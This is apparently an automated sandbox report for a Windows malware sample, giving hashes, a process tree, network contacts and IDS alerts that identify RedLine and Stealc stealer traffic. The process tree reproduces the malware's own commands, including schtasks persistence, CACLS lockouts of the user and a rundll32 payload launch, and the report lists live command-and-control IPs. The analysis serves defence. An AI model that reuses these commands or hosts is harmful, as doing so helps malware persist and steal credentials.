Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 16, 2023, 9:44 a.m.	Oct. 16, 2023, 9:47 a.m.

Size	1.1MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`c7523bca22d87a152b8c10c02736a335`
SHA256	`9085bbc8087cbecc9d9a433b3a1ac70c61348d8c4727f866972fe6b5eccb4871`
CRC32	`A642525B`
ssdeep	`24576:4yks6XulAnoaDWqZ9kbhSGlfJD76HO0ZmCqhi8NQ5AFAV:/565noHqZeFt92HnZTqhi8Nl`
PDB Path	wextract.pdb
Yara	Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature IsPE32 - (no description) CAB_file_format - CAB archive file Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet

foto2552.exe "C:\Users\test22\AppData\Local\Temp\foto2552.exe"
1460
- JD9xE6RV.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\JD9xE6RV.exe
  1720
  - IQ5MD6nz.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\IQ5MD6nz.exe
    2116
    - Ze6Wz5Pk.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\Ze6Wz5Pk.exe
      2188
      - YG2en6hu.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\YG2en6hu.exe
        2232
        
        1sR42BQ9.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\1sR42BQ9.exe
        2276
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        2344
        
        7XUI4o616d4Syjf.exe "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe"
        2980
        
        explothe.exe "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe"
        2112
        
        schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
        2292
        
        cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
        2384
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2604
        
        cacls.exe CACLS "explothe.exe" /P "test22:N"
        2876
        
        cacls.exe CACLS "explothe.exe" /P "test22:R" /E
        1800
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2944
        
        cacls.exe CACLS "..\fefffe8cea" /P "test22:N"
        1020
        
        cacls.exe CACLS "..\fefffe8cea" /P "test22:R" /E
        3048
        
        powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\1000030041\2.ps1"
        2360
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://accounts.google.com/
        2940
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2940 CREDAT:145409
        1676
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2940 CREDAT:79875
        3792
        
        iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2940 CREDAT:79883
        3164
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com/
        2476
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef2a76e00,0x7fef2a76e10,0x7fef2a76e20
        2332
        
        sus.exe "C:\Users\test22\AppData\Local\Temp\1000031051\sus.exe"
        1532
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3060
        
        foto2552.exe "C:\Users\test22\AppData\Local\Temp\1000032051\foto2552.exe"
        3088
        
        Iu4ZR7oE.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\Iu4ZR7oE.exe
        3236
        
        Fa2Qm8Fk.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\Fa2Qm8Fk.exe
        3328
        
        pU6oJ6OP.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\pU6oJ6OP.exe
        3408
        
        aU3Am8Em.exe C:\Users\test22\AppData\Local\Temp\IXP005.TMP\aU3Am8Em.exe
        3468
        
        1ZR81pz6.exe C:\Users\test22\AppData\Local\Temp\IXP006.TMP\1ZR81pz6.exe
        3520
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3832
        
        2Nk190te.exe C:\Users\test22\AppData\Local\Temp\IXP006.TMP\2Nk190te.exe
        3936
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
        3388
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef2a76e00,0x7fef2a76e10,0x7fef2a76e20
        1780
        
        3cO2ru13.exe C:\Users\test22\AppData\Local\Temp\IXP005.TMP\3cO2ru13.exe
        3444
        
        4Pj006nP.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\4Pj006nP.exe
        3320
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3992
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
        2924
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef2b76e00,0x7fef2b76e10,0x7fef2b76e20
        3596
        
        5Pm74xE.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\5Pm74xE.exe
        1340
        
        6Vk59qe.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6Vk59qe.exe
        3076
        
        cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\D5C4.tmp\D5C5.tmp\D5C6.bat C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6Vk59qe.exe"
        3928
        
        nalo.exe "C:\Users\test22\AppData\Local\Temp\1000033051\nalo.exe"
        3196
        
        AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        3668
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        3656
        
        cmd.exe /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe" /tn "\WindowsAppPool\7XUI4o616d4Syjf"
        3016
        
        schtasks.exe schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe" /tn "\WindowsAppPool\7XUI4o616d4Syjf"
        2104
        
        2Au742WU.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\2Au742WU.exe
        2404
      - 3Ko7QU72.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\3Ko7QU72.exe
        2480
    - 4Dl351Uz.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\4Dl351Uz.exe
      2808
      - AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        1700
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
        3712
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef2b76e00,0x7fef2b76e10,0x7fef2b76e20
        3864
  - 5um56Yn.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\5um56Yn.exe
    2316
- 6lN50pn.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6lN50pn.exe
  2948
  - cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\206F.tmp\2070.tmp\2071.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6lN50pn.exe"
    3124

Name	Response	Post-Analysis Lookup
accounts.google.com	A 172.217.25.13	142.250.206.205
fbcdn.net	A 157.240.215.35	157.240.215.35
fonts.gstatic.com	A 142.250.66.67 A 142.250.207.67	142.250.207.99
fonts.googleapis.com	A 142.250.199.74	142.250.207.106
static.xx.fbcdn.net	A 157.240.215.14 CNAME scontent.xx.fbcdn.net	157.240.215.14
www.google.com	A 216.58.200.228	142.250.76.132
facebook.com	A 157.240.215.35	157.240.215.35
ssl.gstatic.com	A 172.217.24.67 A 172.217.24.227	142.250.206.227
fbsbx.com	A 157.240.215.35	157.240.215.35
www.youtube.com	A 142.251.222.206 A 142.250.66.46 A 142.250.207.78 A 172.217.24.238 A 172.217.27.14 A 172.217.25.14 A 172.217.24.110 A 142.250.66.142 A 142.250.199.78 A 142.250.204.46 A 142.250.204.78 A 172.217.31.14 A 142.250.66.110 A 172.217.27.46 CNAME youtube-ui.l.google.com A 142.251.130.14 A 142.250.66.78	142.250.198.14
www.facebook.com	A 157.240.215.35 CNAME star-mini.c10r.facebook.com	157.240.215.35
connect.facebook.net	A 157.240.215.14 CNAME scontent.xx.fbcdn.net	157.240.215.14

IP Address	Status	Action
117.18.232.200	Active	Moloch
142.250.199.74	Active	Moloch
142.250.207.67	Active	Moloch
142.250.66.67	Active	Moloch
142.251.222.206	Active	Moloch
157.240.215.14	Active	Moloch
157.240.215.35	Active	Moloch
164.124.101.2	Active	Moloch
172.217.24.227	Active	Moloch
172.217.24.67	Active	Moloch
172.217.25.13	Active	Moloch
216.58.200.228	Active	Moloch
5.42.92.88	Active	Moloch
77.91.124.1	Active	Moloch
77.91.124.55	Active	Moloch
77.91.68.52	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 5.42.92.88:80	2047625	ET MALWARE [ANY.RUN] Win32/Stealc Checkin (POST)	A Network Trojan was detected
TCP 192.168.56.103:49170 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 77.91.124.55:19071 -> 192.168.56.103:49171	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49188 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49171 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49189 -> 77.91.68.52:80	2032162	ET INFO PS1 Powershell File Request	Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 77.91.68.52:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 77.91.68.52:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 77.91.68.52:80 -> 192.168.56.103:49189	2014819	ET INFO Packed Executable Download	Misc activity
TCP 77.91.68.52:80 -> 192.168.56.103:49189	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.68.52:80 -> 192.168.56.103:49189	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.52:80 -> 192.168.56.103:49189	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49216 -> 172.217.25.13:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49215 -> 172.217.25.13:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49226 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 77.91.68.52:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49221 -> 172.217.24.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49246 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49247 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49242 -> 142.251.222.206:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49243 -> 142.251.222.206:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 77.91.68.52:80 -> 192.168.56.103:49189	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.52:80 -> 192.168.56.103:49189	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49245 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49236 -> 216.58.200.228:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49250 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49172 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49269 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49249 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49273 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49255 -> 142.250.199.74:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49275 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49254 -> 142.250.199.74:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49257 -> 142.250.207.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49259 -> 142.250.207.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49262 -> 172.217.25.13:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49303 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49265 -> 142.251.222.206:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49266 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49267 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49271 -> 172.217.24.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49276 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49285 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 77.91.124.55:19071 -> 192.168.56.103:49235	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49299 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49264 -> 142.251.222.206:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49302 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49305 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49272 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49307 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49317 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 77.91.124.55:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49322 -> 172.217.25.13:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49311 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49300 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49329 -> 172.217.24.227:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49287 -> 77.91.124.1:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49309 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49330 -> 172.217.24.227:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49287 -> 77.91.124.1:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49323 -> 172.217.25.13:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 77.91.124.1:80 -> 192.168.56.103:49287	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49290 -> 77.91.124.55:19071	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 5.42.92.88:80	2018358	ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1	Potentially Bad Traffic
TCP 77.91.124.1:80 -> 192.168.56.103:49287	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.124.1:80 -> 192.168.56.103:49287	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49313 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49327 -> 142.250.199.74:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49297 -> 157.240.215.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49333 -> 142.250.66.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49328 -> 142.250.199.74:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49332 -> 142.250.66.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 77.91.124.1:80 -> 192.168.56.103:49287	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49331 -> 142.250.66.67:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49304 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49306 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49316 -> 157.240.215.14:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
